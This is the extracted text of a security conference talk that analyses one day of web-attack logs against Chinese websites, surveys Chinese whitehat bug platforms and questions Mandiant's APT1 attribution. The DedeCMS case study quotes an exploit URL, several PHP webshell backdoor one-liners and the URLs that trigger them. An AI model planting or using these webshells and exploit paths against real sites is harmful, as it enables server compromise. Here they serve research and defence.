Upload
anthony-lai
View
8.545
Download
1
Embed Size (px)
DESCRIPTION
{Anthony LAI, Zetta KE}, Researcher [en] China is a victim, too :-) アンソニー・ライ、ゼッタ KE 中国はいつも他者を攻撃する攻撃者として認識されているが、逆に「中国が誰かから攻撃を受けているのではないか?」という視点で、どのような攻撃をうけ、どんな理由があるのか?をお見せしよう。 さらに、他の有名な機関から発表されたAPTの調査報告書の内容から、中国からの攻撃を「推測」し、それらの「論理」についてのコメントする。 また、我々はKnownsecからキャプチャされたWeb攻撃データをVXRLで解析を行っており、うまくいけば、より鮮明な絵をお見せすることができると考えている。 もちろん、アジェンダにないオフレコ情報もあるので、みなさんに楽しんでもらえると思う。 China is always taken as an attacker to attack others, let us take a look who is attacking China, what kind of attacks China is suffering from and the possible reason, moreover, we would like to take APT research report published from other famous agency how they "deduce" the attacks from China, commenting on their "logic". In addition, we have got Knownsec to provide captured and identified Web attack data to VXRL for analysis, hopefully, we could get a much more clearer picture. Of course, we got a hidden agenda as well. It would be a fun session and let us enjoy it..
Citation preview
China is a victim, too :) (AVTokyo Special Edition)Darkfloyd x Zetta, VXRL
感謝 ! AVTokyo!
Thank you so much to AVTokyo Panelist
Disclaimer
We are not working for China or Hong Kong government
We didn't get any fund or money from Hong Kong and China government
Objective
● China is always taken as a proactive attacker, we wanna show there is another flip side of analysis through:− Part 1: A single day of Web attack analysis against
various web sites in China.− Part 2: How do you know vulnerabilities published in
China software and web site? ● Media always talks about blackhats in China. How about
whitehats in China?
− Part 3: APT1 report counter-comment (From Ran2)
Part 1: A single day of Web attack analysis against various web sites in China.
Research and Analysis
● We have got a sharing of attack log/data captured by their cloud-based application firewall from Knownsec, Beijing with VXRL so as to carry out the analysis.
● We have picked 11 Nov, which is a day for online shopping/e-commerce (Single's Day,光棍節 ) with discount within Mainland China for this talk.
● We will not disclose any victims' IP address and domain name depending on the criticality or the nature/impact of attack.
Single's Day ?
Single's Day
Single’s Day as Cyber Monday
http://en.wikipedia.org/wiki/Singles_Day
Research and Analysis
● What do we wanna observe and analyze?− Percentage distribution: Attack from overseas Vs
Attack within country− What kind of attacks suffered for those top victims?− Any top attackers?! What are their favorite payloads
skills?− What system(s)/platform(s) do the attackers target?− Any interesting attack payload?
11 Nov: Attack Traffic Vs Period
11 Nov: Attack Traffic Vs Period:Evening and Night Time
Attack Type DistributionAttack Type
No. of Request
Percentage
SCANNER
59101248
91.3447%
LRFI 218753 0.3381%
FILEI 222774 0.3443%
SPECIAL
35838 0.0554%
WEBSHELL
42463 0.0656%
COLLECTOR
4491625 6.9421%
SQLI 274792 0.4247%
XSS 225796 0.3490%
OS_COMMAND
1022 0.0016%
CODE 86140 0.1331%
OTHERS
887 0.0014%
64701338
100.00%
Where are those attackers on e-Shopping Day (11 Nov 2013)?
According to our analysis, 97.5% is from “Within China IP Address”, the remaining 2.5% of attack is from overseas, but it includes scanner type.
How about excluding scanner type?
Country AttackChina 1070489US 18588Netherlands 5404Hong Kong 4288Korea 1823Turkey 1429Japan 872
Top 25 Attackers
Top 25 Attack IPAddresses areFrom China,EXCEPT 24th,it is from US.
Case Studies: Victim or not?!
Voting for a “Good Guy”
Tou.php – “Tou” means “Voting”, in Chinese is “投”
The requests against this site is with 6.5GB data.
In fact, we, Chinese are very positive to support and promote “Good act and Good guys”
Possibly, it is hard to differentiate the real voters and robotic one
When looking at the traffic, we have found attack traffic from Hong Kong
Abuse X-Forwarder to fake different IP address to voting from 58.64.X.X
My favorite ISP :)
Hey, it is 11 Nov (Single's day) for Shopping!
We have found attacks against “Group Purchase Web site”, 47 attempts to access order info data of web site via old classical attack OS cmd
How about those overseas attackers?
Where are they?
Country IPChina 116.252.224.162US 173.208.240.190Korea 119.70.29.137Hong Kong 58.64.205.27Thailand 110.34.230.226Taiwan 118.233.66.105Japan 202.89.232.79
Observation: Any interesting attack payload from overseas?
From US ?! Using China Python Layer-7DDoS script?! :) (from 00:00 to 2359)
Observation: China Tools, IP address from US :)
http://www.dklkt.cn/article.asp?id=233
How about attack traffic from US?
How about attack traffic from US?
• Scanning and exploiting particular recently released vulnerabilities of CMS.
• We will discuss it more in details later.• Targeting forum and CMS.
How about attack traffic from JP?
How about attack traffic from JP?
Nothing special, only casual download, traffic necessarily from scanner.
Interestingly,webscan.360.cn uses JP IP address to scan hosts in China
How about attack traffic from KR?
Nothing special, only casual download, not necessarily from scanner.
315online.com.cn - An Anti-Online Fraud Portal
How about attack traffic from TW and TH?
Typical scanner traffic, nothing special.
How about attack traffic from Netherland?
Scan a Wordpress-similar site in China
Observation: Special Payloads against victims
● <URL>/plus/download.php?open=1&arrs1%5B%5D=99&arrs1%5B%5D=102&arrs1%5B%5D=103&arrs1%5B%5D=95&arrs1%5B%5D=100&arrs1%5B%5D=98&arrs1%5B%5D=112&arrs1%5B%5D=114&arrs1%5B%5D=101&arrs1%5B%5D=102&arrs1%5B%5D=105&arrs1%5B%5D=120&arrs2%5B%5D=109&arrs2%5B%5D=121&arrs2%5B
● Create Webshell backdoor under Dedecms● Against Dedecms, I am kidding, there are lots of other
victims suffered from this kind of vulns:http://www.wooyun.org/searchbug.php?q=dedecms
Dedecms (China-made CMS)
DedeCMS
Reference: DedeCMS Exploit Interesting technique to hid the webshell: put it like a cache file.http://www.nxadmin.com/penetration/1168.html http://blog.csdn.net/seoyundu/article/details/12855759
/plus/download.php exploit - Inject Webshellhttp://www.xiaosedi.com/post/dedecms_exp_01.html
/plus/search.php exploit - Inject Webshellhttp://eoo.hk/oswork/28.htm
DedeCMS backdoor killer from Anquan.orghttp://edu.cnw.com.cn/edu-security/netsec/websec/htm2013/20130807_278959.shtml
As you have found 90sec.php from the log, and there is an .inc file with this statement:{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}However, there is no such file found from the folderWhy?Under data/cache folder, there are several htm (myad-1.htm,myad-16.htm,mytag-1208.htm) files are found with the following code:
<!–
document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);
–>
<!–
document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?
>axxxxx’);echo ‘OK’;@fclose($fp);?>”);
–>
<!–
document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/
[copyright]/e’,$_REQUEST['guige'],’error’);?>”);
–>
It is strange that .htm page could be taken as a webshell, the idea is whether those htm files are included and gernated by another PHP fileAfter checking over, we have figured out: plus/mytag_js.php
Triggering the backdoor webshell with the following URLs by passing in various ID values WITHOUT detected by scanner:
http://www.nxadmin.com/plus/mytag_js.php?id=1208
http://www.nxadmin.com/plus/ad_js.php?id=1
Reference:http://www.nxadmin.com/penetration/1168.html
Part 2: Organizations with China Whitehats
Whitehats in ChinaWooyun: Bugs published in China
● The idea is the same as CVE-Mitre but more informative and organized
● Vendor neutral● Public and open● Promote Whitehats community (
http://www.wooyun.org/whitehats/)
Observation #1: CMS bugs everywhere (after Google
translate)
http://www.wooyun.org/bug.php?action=list&subtype=52
Observation #2: Even some Whitehats reported the
vulns …..● Whitehat reported a high-risk vuln. to 360, but
360 said: Ignored it !● My comment: WTF!
Consistently ignore high and medium level vuln. (highlighted in
Yellow color)
http://www.wooyun.org/corps/%E5%A5%87%E8%99%8E360
Observation #3: Positive reward from vendor and promotion of
whitehats
Zoomeye (www.zoomeye.org)
Whitehats in China: Anquan.org (A Safety Alliance among various software
and security product vendors)● With 800 vendors● Vendor neutral● A platform for public to report any infringement,
privacy violation, phishing attack, etc● http://www.anquan.org/help/aboutus/authen/
If time permits….Part 3: APT1 Report – Counter Comment from Ran2, VXRL
APT1 Report: Counter Comment
● Anyone has read Mandiant APT1 Report?● Analysis was done by Ran2, Researcher,
VXRL.● Mandiant deduced the attack against US from
China PLA Team #61389 with the following deduction:− Attacker profiling via his password− Posts in the forum
APT1 Report from Mandiant
● On 18 February 2013, Mandiant, released an unprecedented report – “APT1: Exposing One of China’s Cyber Espionage Units”. Mandiant claims that they have identified evidence linking an APT attack group, APT1 (aka Comment Crew) to the Military Cover Designator 61398 of the People’s Liberation Army (PLA).
APT1 Report from Mandiant
● Chinese officials have vigorously denied any link to what Mandiant’s accusations of these APT activities.
● Some commentaries said: “Clearly, Mandiant caught Beijing’s hands in the cookie jar”.
● However, some other responses from skeptics said that the evidence produced by Mandiant did not include any alternative conclusions other than pointed at China or the so-called PLA hacking lacks of convincing evidence.
Clarification #1: Attacker Profiling● “APT1 is not a ghost in a digital machine”,
Mandinat claims; they had identified a select number of APT1 personas. In page 51 of the APT1 Report, they provided hints on how they perform the persona profiling, basically by data mining of:− the authors of APT1’s digital weapons, (ie the
malware)− the registrants’ of APT1 FQDN, (aka FQDN
profiling)− the email accounts (in pubic social websites)− the registration records of leaked hackers’ account,
Rootkit.com
Clarification #1: Attacker Profiling
● Based on the profiling results, Mandiant believed that these three personas were based on Shanghai, responsible to authors the malware, preparing and launching the APT1 attacks and they are working for PLA.
● UglyGorilla (UG) is the key persona identified that leads to the above conclusion.
Clarification #1: Attacker Profiling
● Further search on the Internet, I also found Jack Wang’s postings in the China military forum. However, I discovered he, UglyGorilla or Jack Wang actually posted 15 messages, only 2 messages are related to cyber war, all others topics includes, normal warfare and even bio-chemical warfare. He even posted to the forum that he was a military warfare lover, but not mentioned he himself as a soldier. I think this piece of information should also be disclosed in the APT1 Report.
Clarification #1: Attacker Profiling
● Even though we have high chance to proof that UglyGorilla is Jack Wang or Wang Dong who is the author of the APT1 malware, I don’t find hard proof that he is a China soldier or servicing the PLA Unit 61398. The only link I can find is his posting in the Chinese military forum, but on the contrary he also said his was only a military lover.
Clarification #1: Attacker Profiling
Similar to UglyGorilla, the APT1 Report identified another persona, DOTA. Based on a video captured, I guess it was gathered from a RDP connection on the monitored hop that DOTA was once used to register email accounts.
Clarification #1: Attacker Profiling
● It is clearly proof that DOTA was using a Shanghai telephone and he is fluent in English when communicate with other parties. I believe DOTA using the password of “2j3c1k” may means (二局三处一科 )
● but we cannot rule out it bears other meanings, such as (二鸡三吃一刻 ) or the meaning of “the moment of cooking 2 chickens with three different ways”.
Clarification #1: Attacker Profiling
● Yes, it is interesting and there are lots of ways to interpret the simple characters in Chinese.
● I am not trying to find an exit for the accusation, but I would like to see more solid evidence pointing the fingers to the PLA Unit 61398 as APT1.
Clarification #2: Infrastructure, Remote Desktop Sessions
● On page 4, Mandiant mentioned that “there are 1,849 of the 1,905 sessions were observed using keyboard layout was “Chinese (Simplified) – US Keyboard” and they assumed that the attackers used Chinese version of Microsoft OS. Because the attackers are using Chinese version of Microsoft OS, Mandiant implies that APT1 are Mainland Chinese speakers.
Clarification #2: Infrastructure, Remote Desktop Sessions
● Based on the RDP Protocol document from Microsoft, I found out that the RDP client send out its keyboard layout in a 4-bytes specification to the RDP server (the victim or hop, in our case). If a network sniffer was installed on the RDP server, we can collect this piece of digital evidence. If the attackers used “Chinese (Simplified) – US Keyboard”, on the recipient side, we can locate a 4-bytes evidence of 0x0804 from the network packets.
More details from APT1 Counter Comment Report
− http://espionageware.blogspot.hk/
Summary● Interesting payloads and practice against China
sites are shown.● Web attack from overseas against China on 11
Nov (a day for high volume of e-commerce and online shopping) is not the majority.
● Majority of traffic is on crawler and scanner, other than that, the majority of attack is SQLi.
● There are lots of attacks against CMS systems in China.
● There are whitehat non-profit making organizations including Wooyun.org and Anquan.org to help the China security community.
Summary● Expect technical or/and journalist reports with
more reasonable deduction, sufficient proof and scientific analysis.
● We hope to see more balanced view and analysis reports not just labeling China is the only cyberwar actor in this party.
● We hope to see a more fair comment to talk about the positive side of security in China.
● Selling products and solutions are easy by giving a false sense of “threatening”,however, as a researcher, please keep your ethics high and mindset clear. We are researcher and scientist but opportunist.
感謝 Thank you so much :)Respect and appreciate to Zetta and Ran2 for
their work, analysis and time
Highly Appreciate the attack log shared by Knownsec for research purpose.